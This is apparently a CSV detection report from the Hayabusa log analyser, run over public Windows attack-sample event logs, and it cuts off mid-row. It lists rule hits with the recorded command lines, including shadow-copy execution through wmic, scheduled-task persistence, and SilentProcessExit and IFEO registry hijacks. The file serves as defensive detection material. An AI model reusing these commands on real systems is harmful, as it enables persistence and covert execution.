SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:38.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:43.990 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off 
/node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:44.055 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\htxjGDrk /INTERACTIVE:off /node:localhost Service where(name=""VSS"") get state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:45.491 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get state : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=""swprv"") get 
state",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.402 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\YqOMAUgO /INTERACTIVE:off /node:localhost shadowcopy call create ""ClientAccessible"", ""C:\""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:47.478 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.655 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.763 
+09:00,IEWIN7,1,informational,Process Creation,"Command: vssadmin List Shadows : Path: C:\Windows\System32\vssadmin.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:48.827 +09:00,IEWIN7,1,informational,Process Creation,"Command: find ""Shadow Copy Volume"" : Path: C:\Windows\System32\find.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c vssadmin List Shadows| find ""Shadow Copy Volume"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.447 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: C:\Windows\System32\wbem\WMIC.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe process call create \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Suspicious WMI 
Execution,,rules/sigma/process_creation/win_susp_wmi_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.544 +09:00,IEWIN7,1,medium,Shadow Copies Creation Using Operating Systems Utilities,,rules/sigma/process_creation/win_shadow_copies_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:54.632 +09:00,IEWIN7,1,informational,Process Creation,Command: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe : Path: \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.519 +09:00,IEWIN7,1,informational,Process Creation,"Command: cmd.exe /c %%SYSTEMROOT%%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\notepad.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 00:12:59.578 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence - Scheduled Task Management : Command: C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" : Path: C:\Windows\System32\schtasks.exe : User: NT AUTHORITY\SYSTEM : Parent Command: cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn ""eyNQLDvUSuvVPg"" /tr ""\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_exec_from_vss_persistence.evtx +2019-05-28 11:13:52.171 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\osk.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:52.429 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" ""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot11"" """" """" ""6350c17eb"" ""00000000"" ""000005AC"" ""00000590"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:13:53.507 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: IEWIN7\IEUser : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:48.819 +09:00,IEWIN7,1,informational,Process Creation,"Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ : Path: C:\ProgramData\vshadow.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:49.194 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: Process Launched via DCOM : Command: DrvInst.exe ""1"" ""200"" 
""STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot12"" """" """" ""6d110b0a3"" ""00000000"" ""000005B8"" ""000004B0"" : Path: C:\Windows\System32\drvinst.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 11:14:50.413 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""c:\windows\System32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-06-15 07:22:17.988 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\Downloads\a.exe"" : Path: C:\Users\IEUser\Downloads\a.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:21.535 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:31.957 +09:00,IEWIN7,7,informational,WMI Modules 
Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:32.222 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\a.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:47.253 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.441 +09:00,IEWIN7,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 00000040 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.503 +09:00,IEWIN7,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.566 +09:00,IEWIN7,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 00000040 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:22:55.707 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:06.691 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} : Path: C:\Windows\System32\dllhost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.019 +09:00,IEWIN7,1,informational,Process Creation,Command: efsui.exe /efs /keybackup : Path: C:\Windows\System32\efsui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:07.082 +09:00,IEWIN7,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: IEWIN7\IEUser : Parent Command: 
winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.894 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: IEWIN7\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,high,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/sysmon_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.957 +09:00,IEWIN7,1,medium,Suspicious Userinit Child Process,,rules/sigma/process_creation/win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:13.972 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:15.054 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\VBoxTray.exe"" : Path: 
C:\Windows\System32\VBoxTray.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:16.592 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" : Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:23.405 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.811 +09:00,IEWIN7,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:26.999 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" : Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:23:53.358 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe 
/Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:13:42.294 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:14:32.809 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} : Path: C:\Windows\System32\dllhost.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k 
DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:50.488 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:21:51.035 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 : Path: C:\Program Files\Internet Explorer\iexplore.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" : Path: C:\Windows\System32\wscript.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 +09:00,IEWIN7,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 16:22:05.691 
+09:00,IEWIN7,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-20 02:22:37.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 : Path: C:\Windows\System32\reg.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:41.709 +09:00,IEWIN7,13,critical,Registry Persistence Mechanisms,,rules/sigma/registry_event/sysmon_win_reg_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-20 02:22:43.944 +09:00,IEWIN7,1,informational,Process Creation,"Command: reg add ""HKLM\SOFTWARE\Microsoft\Windows 